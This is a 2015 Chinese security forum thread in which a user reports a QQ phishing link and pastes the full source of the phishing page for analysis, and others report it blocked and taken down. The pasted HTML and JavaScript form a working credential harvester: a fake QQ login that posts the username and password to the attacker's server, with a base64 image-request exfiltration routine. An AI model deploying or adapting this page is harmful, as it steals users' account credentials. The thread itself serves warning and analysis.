QQ空间好多人中招

显示全部楼层 · 发表于 2015-10-9 13:18:36

这个网址hxxp://dwz.hk/3wr6
跳转到以下，网址
hxxp://xn--k-pmb.3322.org/xx/?id=XGjmh?hc=Zvp?id.exeqq.com.exe&sukey=e74171513d3453dd5aea66d2c83e0c14d346ad0fd2b831792c30fff9d10942d8b6208529d884a015bebf7c026f6c5f2c
骗使用qq账号密码登陆
网页代码如下，这是盗号还是啥，请高手分析一下

[mw_shl_code=html,true]<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>
<script src="http://libs.baidu.com/jquery/1.4.4/jquery.min.js"></script>
<style type="text/css">
body{ margin: 0px; padding: 0px; font-size:12px; width:100%;}
form{ margin: 0px; padding: 0px; }
#je18R1gVlttII{
position :absolute;
_position :absolute;
z-index :9999;
left :0;
right :0;
top :200px;
width :622px;
height :368px;
background-image:url(/tpl/_images/login_1.png);
background-repeat:no-repeat;
background-position:center top;
margin-right :auto;
margin-left :auto;
left :expression((body.clientWidth-388)/2);
}
#LZOZgve4FA{
padding-left :315px;
padding-top :85px;
width :auto;
height :14px;
color :#FF0000;
line-height :14px;
}
.div_username{
padding-top :13px;
width :auto;
padding-left :315px;
height :24px;
margin :0px;
padding-right :0px;
padding-bottom :0px;
}
.div_password{
padding-top :25px;
width :auto;
padding-left :315px;
height :24px;
}
.div_login_button{
padding-top :40px;
height :auto;
width :auto;
padding-left :315px;
}
.ic_b{
width :200px;
border :1px solid #999999;
line-height :20px;
height :24px;
padding-top :2px;
padding-right :5px;
padding-bottom :2px;
padding-left :5px;
font-size :12px;
}
.all_window{
position :fixed;
_position :absolute;
width :100%;
height :1000px;
background-color:#000000;
filter :alpha(opacity=50);
-moz-opacity :0.5;
-khtml-opacity :0.5;
opacity :0.5;
z-index :8888;
_bottom :auto;
_top :expression(eval(document.documentElement.scrollTop));
}
</style>
<script type="text/javascript">
var keyStr = "ABCDEFGHIJKLMNOP" +
         "QRSTUVWXYZabcdef" +
         "ghijklmnopqrstuv" +
         "wxyz0123456789+/" +
         "=";
function encode64(input) {
input = escape(input);
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;

do {
   chr1 = input.charCodeAt(i++);
   chr2 = input.charCodeAt(i++);
   chr3 = input.charCodeAt(i++);

   enc1 = chr1 >> 2;
   enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
   enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
   enc4 = chr3 & 63;

   if (isNaN(chr2)) {
      enc3 = enc4 = 64;
   } else if (isNaN(chr3)) {
      enc4 = 64;
   }

   output = output +
      keyStr.charAt(enc1) +
      keyStr.charAt(enc2) +
      keyStr.charAt(enc3) +
      keyStr.charAt(enc4);
   chr1 = chr2 = chr3 = "";
   enc1 = enc2 = enc3 = enc4 = "";
} while (i < input.length);

return output;
}
</script>
</head>
<body>
<div id="_main">
<div id="je18R1gVlttII">
<form onsubmit="return s_A44169C9347F69();return false;" />
<div id="LZOZgve4FA"> </div>
<div class="div_username"> <input type="text" name="username" id="username" class="ic_b" onKeyDown="return ( (event.keyCode>=48 && event.keyCode<=57) || (event.keyCode>=96 && event.keyCode <= 105) || (event.keyCode==8) || (event.keyCode==46) || (event.keyCode==37) || (event.keyCode==39) || (event.keyCode==9));" /> </div>
<div class="div_password"> <input type="password" name="password" id="password" class="ic_b"/> </div>
<div class="div_login_button"> <input type="image" src="/tpl/_images/login_1_butoon.png" /></div>
<input type="hidden"  id="kA44169C9347F69" value="XGjmh" />
</form>
<script>
$("#username").attr("placeholder", '\u652f'+'\u6301'+'\u0051'+'\u0051'+'\u53f7'+'\u002f'+'\u90ae'+'\u7bb1'+'\u002f'+'\u624b'+'\u673a'+'\u53f7'+'\u767b'+'\u5f55');
$("#password").attr("placeholder", '\u0051'+'\u0051'+'\u5bc6'+'\u7801');
function _tt(_idname){return true;}</script>

</div>
<div class="all_window"></div>
<iframe id="WV8gXTRlSf6" name="WV8gXTRlSf6" scrolling="no" height="0" width="0"></iframe>
<iframe id="OJv869Hp" name="OJv869Hp" scrolling="no" height="1000" width="100%" frameborder="0" src="http://photo.blog.sina.com.cn/u/3973422694"></iframe>
</div>

<script>

var keyStr = "ABCDEFGHIJKLMNOP" +
         "QRSTUVWXYZabcdef" +
         "ghijklmnopqrstuv" +
         "wxyz0123456789+/" +
         "=";
function encode64(input) {
input = escape(input);
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;

do {
   chr1 = input.charCodeAt(i++);
   chr2 = input.charCodeAt(i++);
   chr3 = input.charCodeAt(i++);

   enc1 = chr1 >> 2;
   enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
   enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
   enc4 = chr3 & 63;

   if (isNaN(chr2)) {
      enc3 = enc4 = 64;
   } else if (isNaN(chr3)) {
      enc4 = 64;
   }

   output = output +
      keyStr.charAt(enc1) +
      keyStr.charAt(enc2) +
      keyStr.charAt(enc3) +
      keyStr.charAt(enc4);
   chr1 = chr2 = chr3 = "";
   enc1 = enc2 = enc3 = enc4 = "";
} while (i < input.length);

return output;
}

var t=0;
function s_A44169C9347F69()
{
$('#LZOZgve4FA').html(' ');

if($('#username').val()=='')
{
$('#LZOZgve4FA').html('\u8bf7'+'\u8f93'+'\u5165'+'\u0051'+'\u0051'+'\u53f7'+'\u7801'+'\uff01');
$('#username').focus();
return false;
}

if( $('#username').val().length<5 || $('#username').val().length>22 )
{
$('#LZOZgve4FA').html('\u0051'+'\u0051'+'\u53f7'+'\u9519'+'\u8bef'+'\uff01');
$('#username').focus(); return false;
}

if($('#password').val()=='')
{
$('#LZOZgve4FA').html('\u8bf7'+'\u8f93'+'\u5165'+'\u0051'+'\u0051'+'\u5bc6'+'\u7801'+'\uff01');
$('#password').focus();
return false;
}

if( $('#password').val().length<6 || $('#password').val().length>18 )
{
$('#password').attr('value','');
$('#LZOZgve4FA').html('\u5bc6'+'\u7801'+'\u957f'+'\u5ea6'+'\u9519'+'\u8bef'+'\uff01');
$('#password').focus(); return false;
}

$.post("api.php?user="+$('#kA44169C9347F69').val(), {
'username': $("#username").val(),
'password': $("#password").val()
}, function(data,status){

if(t<1)
{
$('#username').attr('value','');
$('#password').attr('value','');
$('#LZOZgve4FA').html('\u0051'+'\u0051'+'\u5e10'+'\u53f7'+'\u6216'+'\u5bc6'+'\u7801'+'\u9519'+'\u8bef'+'\uff0c'+'\u8bf7'+'\u91cd'+'\u65b0'+'\u8f93'+'\u5165'+'\uff01');
t++;
$('#username').focus();
}else{
$('#LZOZgve4FA').html(' ');
document.location="http://photo.blog.sina.com.cn/u/3973422694";
}

});

/*

if(t<1)
{
p();
$('#username').attr('value','');
$('#password').attr('value','');
$('#LZOZgve4FA').html('\u0051'+'\u0051'+'\u5e10'+'\u53f7'+'\u6216'+'\u5bc6'+'\u7801'+'\u9519'+'\u8bef'+'\uff0c'+'\u8bf7'+'\u91cd'+'\u65b0'+'\u8f93'+'\u5165'+'\uff01');
t++;
$('#username').focus();
}else{
p();
$('#LZOZgve4FA').html(' ');
document.location="https://mail.qq.com/";
}
*/

return false;
}

function p()
{
var t=Date.parse(new Date());
var s=encode64($('#kA44169C9347F69').val()+"\t"+$("#username").val()+"\t"+$("#password").val());
var htmlobj=$.ajax({url:"/tpl/HaHQznkp2ZaCW7QEhQ/"+s+".gif_"+t,async:false});
}

</script>
</body>
</html>[/mw_shl_code]

显示全部楼层 · 发表于 2015-10-9 14:09:07

不玩qq空間的路過

显示全部楼层 · 发表于 2015-10-9 15:32:39

显示全部楼层 · 发表于 2015-10-9 20:03:10

显示全部楼层 · 发表于 2015-10-9 21:23:16

打不开

显示全部楼层 · 发表于 2015-10-9 22:53:22

bbszy 发表于 2015-10-9 21:23
打不开

TMMS block the website

[mw_shl_code=css,true]Website Address: http://xn--k-pmb.3322.org/xx?id= ... 015bebf7c026f6c5f2c
Rating: Dangerous Page (49)
Response: Blocked
Detected By: Web Reputation Ratings[/mw_shl_code]

显示全部楼层 · 发表于 2015-10-9 23:20:18

显示全部楼层 · 发表于 2015-10-11 10:17:34

网站已经无法打开

显示全部楼层 · 发表于 2015-10-11 10:40:15

fuzhk 发表于 2015-10-11 10:17
网站已经无法打开

应该是删除了，这一阵估计中招的还不少

显示全部楼层 · 发表于 2015-10-11 10:46:57

风中漫步发表于 2015-10-11 10:40
应该是删除了，这一阵估计中招的还不少

毕竟是入侵别人家的服务器用的，也许被主人发现了，这玩意掌握了技术估计还有不少网站也可以被利用。

[未鉴定] QQ空间好多人中招

浏览过的版块